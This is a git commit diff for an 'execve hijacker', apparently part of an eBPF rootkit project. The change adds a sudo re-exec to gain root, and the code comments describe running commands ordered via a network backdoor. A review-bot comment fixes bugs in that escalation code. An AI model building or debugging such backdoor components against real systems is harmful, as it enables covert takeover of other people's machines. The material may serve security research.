Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

This commit is contained in:
h3xduck
2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions


@@ -64,8 +64,22 @@ char* getLocalIpAddress(){
return IPbuffer;
}
int main(int argc, char* argv[]){
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from execve hijacker\n");
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = "sudo";
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
execve("/usr/bin/sudo", args, envp);
}
time_t rawtime;
struct tm * timeinfo;
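Review bot: The argv assembled for the sudo re-exec is not NULL-terminated: `char* args[argc+1]` has exactly argc+1 slots and the loop fills indices 0..argc with "sudo" plus the original arguments, so execve() reads past the end of the array looking for the terminator, which is undefined behavior and may pass garbage arguments to sudo. Size it `char* args[argc+2];` and set `args[argc+1] = NULL;` after the copy loop. The execve() return value is also unchecked: if /usr/bin/sudo is missing or the user fails authentication, control falls through and the rest of main keeps running unprivileged as though the re-exec had succeeded, so follow the call with `perror("execve"); return 1;` (or whatever failure policy is intended). Note too that argv[0] is forwarded verbatim as the program for sudo to run, so a relative or bare name may not resolve under sudo's secure_path — presumably the hijacker is always invoked by absolute path, but that is worth confirming. main's body continues into the next hunk and past the end of this page.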
@@ -74,10 +88,6 @@ int main(int argc, char* argv[]){
timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo);
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
//We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id()